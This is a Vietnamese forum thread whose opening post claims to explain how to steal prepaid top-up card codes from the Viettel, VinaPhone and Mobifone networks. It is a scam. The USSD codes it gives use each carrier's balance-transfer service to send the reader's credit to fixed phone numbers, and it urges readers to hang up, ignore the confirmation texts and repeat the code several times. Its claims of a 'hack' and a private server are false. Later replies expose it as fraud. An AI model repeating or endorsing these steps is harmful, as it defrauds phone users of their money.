PHẦN 1: HACK THẺ NẠP VIETTEL

Xin được sẻ chia với các bạn 1 thủ thuật đánh cắp mã số thẻ cào mạng VIETTEL. tui mới nghiên cứu ra, và đang thực hiện thành công 100%

Nếu các bạn làm đúng cá bước sau mà vẫn không được thì có thể gặp trực tiếp tui tại số nhà 31 Nguyễn Chí Thanh-Đống Đa-Hà Nội, gặp Thu Hằng

Đây là hình ảnh số tiền tui Hack được của VIETTEL

Hình ảnh tin nhắn thẻ cào vừa được sử dụng, các bạn đừng nạp thử.

Điều kiện: Bạn phải có 1 sim trả trước hay trả sau của VIETTEL - Số dư TK (Chính hay phụ) Trên > 32.198VND - Sim vừa hoạt động trên 180 ngày.

Với những sim hoạt động trên 180 ngày mới được VIETTEL đưa thuê bao đó vào danh sách hệ thống thuê bao tín nhiệm và được bảo vệ bởi nhà mạng.

Bước 1: Bạn soạn tin nhắn với cú pháp: MK rồi gửi đến 136, để lấy mật (an ninh) khẩu, vì sao? đơn giản vì ta Hack qua dịch vụ I-SHARE của VIETTEL.

Chú ý: Bạn nào vừa có mật (an ninh) khẩu thì bỏ qua bước này.

Bước 2: bạn thoát ra ngoài màn hình và soạn cú pháp: *136*MK*008-416-7898-8392*30000# rồi nhấn phím gọi đi và ấn phím tắt ngay lập tức.

Lưu ý: Bạn phải ấn phím tắt ngay lập tức thì mới gây lãng cho server riêng, mà tui đã nghiên cứu và tạo ra để lấy cắp thông tin của VIETTEL.

Sau vài giây sẽ có tin nhắn bạn đừng phí thời (gian) gian đọc tin nhắn, hãy làm thật nhanh cú pháp trên 3-4 lần nữa,vì nếu làm chậm thì sẽ không Hack được. Bạn làm cú pháp càng nhiều thì mã số sẽ càng chính xác

Sau khi thực hiện cú pháp trên 3-4 lần liên tiếp, bạn nhận được 1 tin nhắn từ tổng đài +198 với mệnh giá thẻ cào được lựa chọn ngẫu nhiên.

Lưu ý: 1. Mệnh giá thẻ được tổng đài +198 gửi đến bạn qua tin nhắn SMS có giá trị như các mệnh giá được VIETTEL cung cấp trên thị trường.

2. Để an toàn cho chúng tui cũng như sự tồn tại lâu dài của máy chủ server riêng - máy chủ chỉ chấp nhận 1 lần giao dịch đối với từng số đt

Nhanh chân lên bạn. chúc bạn nhận được thẻ cào với mệnh giá cao nhất!

các bạn hãy mau lên đi kẻo VIETTEL biết sửa lỗi là không Hack được nữa đâu nha.

Mọi thắc mắc, yêu cầu về bất cứ vấn đề gì mời bạn gửi về họp thư

email: [email protected]

Chúc các bạn thành công.

PHẦN 2: HACK THẺ NẠP MẠNG VINAPHONE

Xin được sẻ chia với các bạn 1 thủ thuật đánh cắp mã số thẻ cào mạng VinaPhone. tui mới nghiên cứu ra, và đang thực hiện thành công 100%

Nếu các bạn làm đúng cá bước sau mà vẫn không được thì có thể gặp trực tiếp tui tại số nhà 31 Nguyễn Chí Thanh-Đống Đa-Hà Nội, gặp Thu Hằng

Điều kiện: Bạn phải có 1 sim trả trước hay trả sau của VinaPhone - Số dư TK (Chính) Trên > 52.198VND - Sim vừa hoạt động trên 180 ngày.

Với những sim hoạt động trên 180 ngày mới được VinaPhone đưa thuê bao đó vào danh sách hệ thống thuê bao tín nhiệm và được bảo vệ bởi nhà mạng.

Bước 1:bạn soạn tin DK gửi tới 999 để lấy mât khẩu của bạn, vì sao? đơn giản vì ta Hack qua dịch vụ 2Friends của VinaPhone

Bước 2: bạn thoát ra ngoài màn hình và soạn cú pháp:
*999*mật khẩu*012-52-863-605*50000# rồi nhấn phím gọi đi và ấn phím tắt ngay lập tức.Đợi 2 giây rồi tắt luôn cả điện thoại đi, đừng đọc tin nhắn làm gì cho mất thời (gian) gian

Lưu ý: Bạn phải ấn phím tắt ngay lập tức,sau đó tắt luôn điện thoại, rồi 2 phút sau mới dc mở đt lên thì mới gây lãng cho server riêng, mà tui đã nghiên cứu và tạo ra để lấy cắp thông tin của VinaPhone

Sau vài giây sẽ có tin nhắn bạn đừng phí thời (gian) gian để đọc tin nhắn, hãy làm thật nhanh cú pháp trên 1 lần nữa,vì nếu làm chậm thì sẽ không Hack được

Sau khi thực hiện cú pháp trên 3-4 lần liên tiếp, bạn nhận được 1 tin nhắn từ tổng đài 999 với mệnh giá thẻ cào được lựa chọn ngẫu nhiên.

Lưu ý: 1. Mệnh giá thẻ được tổng đài 999 gửi đến bạn qua tin nhắn SMS có giá trị như các mệnh giá đượcVinaPhone cung cấp trên thị trường.

2. Để an toàn cho chúng tui cũng như sự tồn tại lâu dài của máy chủ server riêng - máy chủ chỉ chấp nhận 1 lần giao dịch đối với từng số đt

các bạn hãy mau lên đi kẻo VinaPhone biết sửa lỗi là không Hack được nữa đâu nha.

PHẦN 3:HACK THẺ NẠP MẠNG MOBIFONE

Xin được sẻ chia với các bạn 1 thủ thuật đánh cắp mã số thẻ cào mạng Mobifone. tui mới nghiên cứu ra, và đang thực hiện thành công 100%

Nếu các bạn làm đúng các bước sau mà vẫn không được thì có thể gặp trực tiếp tui tại số nhà 31 Nguyễn Chí Thanh-Đống Đa-Hà Nội, gặp Thu Hằng

Điều kiện: Bạn phải có 1 sim trả trước hay trả sau của VinaPhone - Số dư TK (Chính) Trên > 32.198VND - Sim vừa hoạt động trên 180 ngày.

Với những sim hoạt động trên 180 ngày mới được Mobifone đưa thuê bao đó vào danh sách hệ thống thuê bao tín nhiệm và được bảo vệ bởi nhà mạng.

Bước 1:bạn làm theo cú pháp như sau: *117*11010*11010#. Hệ thống sẽ gửi cho bạn 1 tin nhắn. Bạn vào trả lời, soạn tin với cú pháp 1 và gửi đi để đồng ý (nếu bạn chưa có mật (an ninh) khẩu sever). Tại sao phải cần vậy? Vì chúng ta hack thông qua dịch vụ M2U của Mobifone.

Bước 2: bạn thoát ra ngoài màn hình và soạn cú pháp:
*119*012-28-371-692*30000 *11010# rồi nhấn phím gọi đi và Hệ thống sẽ trả lời cho bạn 1 tin nhắn,báo sẽ chuyển tiền sang 1 số điện thoại, thực chất đó là vờ chuyển tiền sang 1 sever là 012-28-371-692,lúc đó bạn soạn tin 1 để đồng ý.Sau đó ấn phím tắt ngay lập tức.

Lưu ý: Bạn phải ấn phím tắt ngay lập tức thì mới gây lãng cho server riêng, mà tui đã nghiên cứu và tạo ra để lấy cắp thông tin của Mobifone

Sau vài giây sẽ có tin nhắn bạn đừng phí thời (gian) gian đọc tin nhắn, hãy làm thật nhanh cú pháp trên 1 lần nữa,vì nếu làm chậm thì sẽ không Hack được

Sau khi thực hiện cú pháp trên 3-4 lần liên tiếp, bạn nhận được 1 tin nhắn từ tổng đài với mệnh giá thẻ cào được lựa chọn ngẫu nhiên.

Lưu ý: 1. Mệnh giá thẻ được tổng đài gửi đến bạn qua tin nhắn SMS có giá trị như các mệnh giá được Mobifone cung cấp trên thị trường.

các bạn hãy mau lên đi kẻo Mobifone biết sửa lỗi là không Hack được nữa đâu nha.

:tease:Bài viết mang tính chất chém gió

bagia_khatmaum

Mod đâu block nick với xóa topic này đi chứ

Trò này ai chả biết,gọi đến số thằng chủ thớt( 016-7898-8392 ) chửi chết mẹ nó đi,mất nết đi lừa nhau hả.Trò này đi lừa học sinh mẫu giáo nhé

thanhtongthvl

Con mẹ nó. Tuong ai cung ngu như nó. Lam̀ đọc cả buổi. không tien thì a cho chu viet ba viet me the nay chet voi a.

[ Post bai thong qua Mobile ]

Các chủ đề có liên quan khác